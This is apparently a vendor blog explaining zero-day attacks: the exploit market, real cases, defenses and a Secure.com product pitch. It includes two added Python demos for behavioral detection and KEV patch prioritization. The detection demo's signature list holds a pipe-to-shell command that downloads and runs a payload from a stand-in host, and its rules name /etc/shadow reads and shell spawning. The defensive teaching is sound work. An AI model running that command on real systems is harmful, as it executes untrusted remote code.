Key Takeaways
- A zero-day attack exploits a software flaw the vendor has never seen before. No patch. No warning. No defense on day one.
- In 2025, Google’s Threat Intelligence Group tracked 90 zero-days exploited in the wild. Enterprise technology was hit hardest, accounting for 48% of all zero-day targets.
- Attackers are no longer just going after browsers and phones. VPNs, firewalls, and security appliances are now the primary targets.
- A working zero-day exploit can sell for anywhere from $100,000 to $2 million on underground markets.
- Traditional antivirus and signature-based tools cannot detect zero-days they’ve never seen before. Behavioral detection is the practical alternative.
- Speed and visibility are the two things organizations actually control. Both are fixable.
Introduction
In 2025, the average time between a vulnerability being discovered and its active exploitation dropped to just 5 days. For zero-days, that window doesn’t exist at all. Attackers already know about the flaw. Your vendor doesn’t. And your team is flying blind.
What Is a Zero-Day Attack?
A zero-day attack happens when a threat actor exploits a software vulnerability before the software vendor knows it exists.
The name reflects the defender’s situation: the vendor has had zero days to fix the problem. There’s no patch to install. No alert to act on. The flaw is completely unknown to everyone except the attacker.
It’s worth knowing the difference between a few related terms that often get used as if they mean the same thing:
- Zero-day vulnerability: The actual flaw in the software. A bug, a design error, or an unintended behavior that can be exploited.
- Zero-day exploit: The code or method an attacker uses to take advantage of that flaw.
- Zero-day attack: What happens when an attacker uses the exploit against a real target.
All three are connected, but the attack is the part that causes actual damage.
The Zero-Day Exploit Market
This is the part most people don’t realize exists.
Zero-day exploits are bought and sold like commodities. There’s a legal side, a grey side, and a fully criminal side. On the legal end, bug bounty programs pay researchers to responsibly report vulnerabilities. On the grey and criminal end, exploit brokers sell working zero-days to the highest bidder.
Between January 2023 and September 2024, researchers identified 547 listings on dark web forums and private Telegram channels advertising exploits for sale. More than half of those listings involved zero-day or one-day vulnerabilities.
Prices vary based on the target and how hard the exploit is to detect:
- Remote code execution (RCE) exploits averaged around $100,000
- A Microsoft Outlook zero-day sold for nearly $2 million
- iPhone zero-days have fetched up to $7 million through certain brokers
- Basic IoT device exploits can go for as little as $1,000
Buyers include nation-state intelligence agencies, ransomware groups, and commercial surveillance vendors. The flaw you don’t know about might already be changing hands somewhere.
How Zero-Day Attacks Work
Zero-days don’t come from nowhere. They follow a predictable path from discovery to damage.
The Attack Lifecycle
Here’s how a zero-day typically plays out:
1. A flaw goes undetected inside software. The developer doesn’t know it’s there.
2. An attacker or researcher finds it, often through reverse engineering, fuzzing, or code review.
3. The attacker builds an exploit that takes advantage of the flaw.
4. The attack is launched against a target before any patch exists.
5. The vendor finds out, usually after reports of suspicious activity or a detected breach.
6. A patch is rushed out, sometimes days or weeks after the damage is done.
During that window between steps 3 and 6, the attacker operates with no resistance from the software’s own security controls.
Who Actually Launches Zero-Day Attacks
Not everyone doing this has a government budget. But most of the sophisticated ones do.
Nation-state groups are the most prolific zero-day users. Chinese, Russian, North Korean, and Iranian threat actors consistently top attribution reports. Google’s Threat Intelligence Group attributed nearly 30% of zero-day exploitation in 2024 to groups backed by China alone.
Commercial surveillance vendors are a growing category. These are private companies that build and sell zero-day exploit chains to governments for intelligence purposes. Many attacks on journalists and activists have been traced back to tools sold by these vendors.
Ransomware groups also buy and use zero-days. Over 60% of ransomware attacks in 2024 used zero-day exploits. They don’t always develop these tools themselves; they purchase access through exploit brokers.
What Attackers Are Targeting Now
The target profile has shifted significantly in the last two years.
Attackers used to focus on browsers, mobile phones, and operating systems. That’s changing. In 2024, 44% of all zero-day exploitation targeted enterprise technologies. In 2025, that number held near 48%.
More specifically, attackers are going after the tools organizations use to protect themselves: VPNs, firewalls, and security appliances. In 2024, 20 of the 33 enterprise zero-days targeted security and networking products. These systems are attractive because they sit at the edge of the network, they rarely have endpoint detection tools installed, and compromising one often means full network access.
The companies with the most targeted zero-days in 2024 were Microsoft (26 vulnerabilities), Google (11), Ivanti (7), and Apple (5). Ivanti’s rise on that list reflects the broader shift toward attacking enterprise network perimeter devices.
Real-World Zero-Day Examples
Understanding how zero-days work in practice helps make the abstract threat concrete.
Stuxnet (2010)
Stuxnet remains one of the most sophisticated cyberweapons ever deployed. It exploited four separate zero-day vulnerabilities to target industrial control systems at Iran’s nuclear enrichment facilities. The worm caused physical damage to centrifuges by making them spin at incorrect speeds while reporting normal readings to operators. It’s widely attributed to a joint US-Israeli operation. The lesson: zero-days can cause physical, not just digital, destruction.
Log4Shell (2021)
A critical flaw in Apache Log4j, a logging library embedded in millions of applications, allowed attackers to execute code on vulnerable servers by sending a single text string. CVSS severity score: 10 out of 10. At its peak, security firms tracked over 100 attacks per minute targeting this single flaw. Many organizations still don’t have full visibility into where Log4j runs in their environments. Years later, it remains one of the most exploited vulnerabilities in CISA’s Known Exploited Vulnerabilities catalog.
MOVEit (2023)
The Cl0p ransomware group discovered and exploited a SQL injection flaw in MOVEit Transfer, a file transfer tool used by thousands of organizations. Exploitation began before Progress Software knew the flaw existed. Government agencies, universities, banks, and major corporations were all compromised. Some evidence suggests Cl0p was quietly testing the vulnerability as far back as 2021 while waiting for the right moment to strike at scale.
Ivanti VPN Zero-Days (2024)
Multiple zero-day vulnerabilities in Ivanti’s Connect Secure and Policy Secure products were exploited by Chinese state-backed threat actors. The attacks used advanced lateral movement techniques to stay hidden inside networks for extended periods. Healthcare organizations and manufacturers were primary targets. The campaign showed how a single compromised VPN appliance can become a full network entry point with minimal detection.
How to Defend Against Zero-Day Attacks
You cannot patch what you don’t know exists. But you can make your environment much harder to exploit and much faster to recover from.
Use Behavioral Detection, Not Just Signatures
Signature-based tools look for patterns they already recognize. Zero-days, by definition, have no known signature. Behavioral detection looks at what software is actually doing: what processes it’s spawning, what network calls it’s making, what files it’s touching. Unusual behavior gets flagged even without a known threat signature.
This includes endpoint detection and response (EDR) tools, network traffic analysis, and anomaly-based alerting.
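As an added example (not code from the article or from Secure.com), the contrast described above run over a few constructed telemetry events: the signature lookup matches nothing, while three behavioural rules, one per class of activity the paragraph names (process spawning, network calls, file access), flag a server process that opens an unexpected outbound connection, spawns a shell, and reads a sensitive file. The event fields, process names, port list, and file paths are assumptions made for the demo.

```python
import json

# Constructed telemetry (not real data): JSON lines in the shape an EDR agent might emit.
TELEMETRY = """
{"ts": "2025-03-01T10:00:01Z", "type": "process", "parent": "systemd", "image": "java", "cmd": "java -jar app.jar"}
{"ts": "2025-03-01T10:00:05Z", "type": "network", "process": "java", "dst": "api.example.internal", "dst_port": 443}
{"ts": "2025-03-01T10:02:10Z", "type": "network", "process": "java", "dst": "198.51.100.7", "dst_port": 1389}
{"ts": "2025-03-01T10:02:11Z", "type": "process", "parent": "java", "image": "sh", "cmd": "sh -c id"}
{"ts": "2025-03-01T10:03:00Z", "type": "file", "process": "sh", "path": "/etc/shadow", "op": "read"}
"""

# A signature tool only matches what it has already seen. This list is a constructed stand-in.
KNOWN_BAD_CMDLINES = {"curl http://malware.example/payload.sh | sh"}

# Behavioural rules describe what a server-side process should never do, not a specific exploit.
SERVER_PROCESSES = {"java", "httpd", "nginx", "node"}
SHELLS = {"sh", "bash", "cmd.exe", "powershell.exe"}
EXPECTED_PORTS = {80, 443, 53}
SENSITIVE_PATHS = {"/etc/shadow", "/etc/passwd"}

def parse(lines):
    return [json.loads(line) for line in lines.strip().splitlines()]

def signature_findings(events):
    """Exact-match lookup: misses anything whose command line is not already on the list."""
    return [e["ts"] for e in events if e.get("cmd") in KNOWN_BAD_CMDLINES]

def behavioural_findings(events):
    """Flag by what the process does: what it spawns, where it connects, what it touches."""
    findings = []
    for e in events:
        if e["type"] == "process" and e["parent"] in SERVER_PROCESSES and e["image"] in SHELLS:
            findings.append(("server_spawned_shell", e["ts"]))
        elif e["type"] == "network" and e["process"] in SERVER_PROCESSES \
                and e["dst_port"] not in EXPECTED_PORTS:
            findings.append(("unexpected_outbound_port", e["ts"]))
        elif e["type"] == "file" and e["process"] in SHELLS and e["path"] in SENSITIVE_PATHS:
            findings.append(("shell_read_sensitive_file", e["ts"]))
    return findings

def run(telemetry=TELEMETRY):
    """Return (signature hits, behavioural hits) for the same event stream."""
    events = parse(telemetry)
    return signature_findings(events), behavioural_findings(events)

if __name__ == "__main__":
    sigs, behaviours = run()
    print(f"signature hits: {len(sigs)}, behavioural hits: {behaviours}")
```

In a real deployment the rules would key on process lineage and baselines learned per host rather than fixed name sets, but the shape of the decision is the same.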
Shrink Your Attack Surface
Every application, port, and service that doesn’t need to be running is an opportunity for an attacker to find something you missed. Remove unnecessary software. Disable services that aren’t in use. Apply the principle of least privilege so that if one account or system is compromised, the damage is contained.
Apply Zero Trust Architecture
Zero trust means no user, device, or system is automatically trusted, even if they’re already inside the network. Every access request is verified. This doesn’t stop a zero-day, but it limits what an attacker can do after they get in. Lateral movement becomes harder. Sensitive systems stay isolated.
Patch Everything Else Fast
Zero-days are the ones you can’t patch. Everything else, you can. Organizations that take months to apply patches are handing attackers a well-documented path in. CISA’s Known Exploited Vulnerabilities catalog is the clearest signal of what’s being actively used in real attacks. Anything on that list should be treated as an emergency.
Explore how continuous vulnerability management keeps your known exposure at a minimum.
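As an added example (not from the article or from Secure.com), one way to turn the KEV catalog into a ranked patch queue: join KEV entries to an asset inventory and order the work by exposure, known ransomware use, and whether CISA’s due date has already passed. The entries use the real KEV feed’s field names (cveID, vendorProject, product, dateAdded, dueDate, knownRansomwareCampaignUse) with constructed placeholder values; the inventory, the name-matching rule, and the scoring weights are assumptions for the demo.

```python
from datetime import date

# Constructed KEV entries using the real feed's field names; the CVE ids are placeholders.
KEV_SUBSET = [
    {"cveID": "CVE-0000-00001", "vendorProject": "ExampleVendor", "product": "Edge VPN",
     "dateAdded": "2025-03-01", "dueDate": "2025-03-22", "knownRansomwareCampaignUse": "Known"},
    {"cveID": "CVE-0000-00002", "vendorProject": "ExampleVendor", "product": "Office Suite",
     "dateAdded": "2025-02-10", "dueDate": "2025-03-03", "knownRansomwareCampaignUse": "Unknown"},
    {"cveID": "CVE-0000-00003", "vendorProject": "OtherVendor", "product": "Message Broker",
     "dateAdded": "2025-01-05", "dueDate": "2025-01-26", "knownRansomwareCampaignUse": "Unknown"},
]

# Constructed asset inventory: what continuous asset discovery would feed in.
INVENTORY = [
    {"host": "vpn-edge-01", "vendor": "ExampleVendor", "product": "Edge VPN", "internet_facing": True},
    {"host": "fileserver-02", "vendor": "examplevendor", "product": "office  suite", "internet_facing": False},
    {"host": "build-03", "vendor": "ExampleVendor", "product": "Office Suite", "internet_facing": False},
]

def _norm(s):
    # Case and whitespace differ between feeds and inventories; normalise before joining.
    return " ".join(s.lower().split())

def affected_assets(entry, inventory):
    """Join a KEV entry to assets by normalised vendor + product name (assumed matching rule)."""
    key = (_norm(entry["vendorProject"]), _norm(entry["product"]))
    return [a for a in inventory if (_norm(a["vendor"]), _norm(a["product"])) == key]

def priority(entry, asset, today):
    """Higher is more urgent; weights are illustrative, not a standard."""
    score = 1  # anything on KEV starts above the ordinary backlog
    if asset["internet_facing"]:
        score += 3  # edge devices are where this article says attackers now go first
    if entry["knownRansomwareCampaignUse"] == "Known":
        score += 2
    if date.fromisoformat(entry["dueDate"]) < today:
        score += 2  # overdue against the catalog's own remediation deadline
    return score

def ranked_work(kev, inventory, today):
    """Return (score, cveID, host) rows, most urgent first; `today` may be a date or ISO string."""
    if isinstance(today, str):
        today = date.fromisoformat(today)
    rows = [(priority(e, a, today), e["cveID"], a["host"])
            for e in kev for a in affected_assets(e, inventory)]
    return sorted(rows, key=lambda r: (-r[0], r[1], r[2]))

if __name__ == "__main__":
    for score, cve, host in ranked_work(KEV_SUBSET, INVENTORY, date.today()):
        print(score, cve, host)
```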
Build and Test an Incident Response Plan
When a zero-day hits, your team has hours, not days, to contain it. Organizations without a tested incident response plan take far longer to isolate the threat, and every hour matters. Run tabletop exercises. Know who makes what decisions and in what order. Define what “containment” looks like before you need it.
Keep Full Asset Visibility
You cannot protect what you don’t know exists. Unmanaged endpoints, forgotten cloud instances, and shadow IT are common zero-day entry points. If an attacker finds an asset your team doesn’t know about, they have time to operate without any pressure. Continuous asset discovery closes that gap.
How Secure.com Helps
Zero-day defense isn’t just a technology problem. It’s a speed and visibility problem. And most lean security teams don’t have enough of either.
Secure.com’s Digital Security Teammates are built for exactly this situation. The SOC Teammate works continuously so your team doesn’t have to start from scratch every time something new surfaces.
Here’s what that looks like in practice:
- Continuous asset visibility: Every device, endpoint, and system in your environment is discovered and mapped through agentless scanning. The platform maintains a living knowledge graph that reveals shadow IT and unmanaged assets before attackers can exploit them.
- AI-driven alert triage: The SOC Teammate automatically enriches alerts with asset criticality, threat intelligence, and business context, then prioritizes based on real risk—not just CVSS scores. Your analysts see a ranked queue of what actually matters, with 75% faster triage time.
- Unified knowledge graph: Asset relationships, vulnerability context, identity data, and threat intelligence connect in a living graph that updates in real time. When a zero-day is disclosed, you instantly see which assets are affected, who owns them, what data they touch, and what the blast radius looks like—without jumping between tools.
- Automated remediation workflows: When a zero-day patch drops, the platform automatically identifies affected assets, assigns ownership via HRMS integration, creates tickets in Jira/ServiceNow with full context, and tracks remediation SLAs. Low-risk patches can be deployed automatically; high-impact changes require human approval with full audit trails.
The 5-day exploit window is real. Secure.com Digital Security Teammates are built to help your team move inside it—with 30-40% faster detection (MTTD), 45-55% faster response (MTTR), and automated workflows that turn vulnerability disclosures into prioritized remediation work in minutes, not days.
FAQs
How do attackers find zero-day vulnerabilities?
Can antivirus software detect a zero-day attack?
Who is most at risk from zero-day attacks?
How long does a zero-day stay dangerous?
Conclusion
Zero-day attacks are the hardest category of threat to defend against. You cannot patch a flaw you don’t know exists. You cannot write a signature for an exploit that’s never been seen before.
But that doesn’t mean there’s nothing you can do.
Organizations that get hit hardest are usually the ones with poor visibility into their own environment, slow patching habits for known issues, and detection tools built entirely on signatures. Fix those three things and you’ve already put yourself well ahead of most targets.
Zero-days will keep coming. The organizations that survive them aren’t the ones with the biggest budgets. They’re the ones that see faster, respond faster, and don’t give attackers a comfortable place to hide.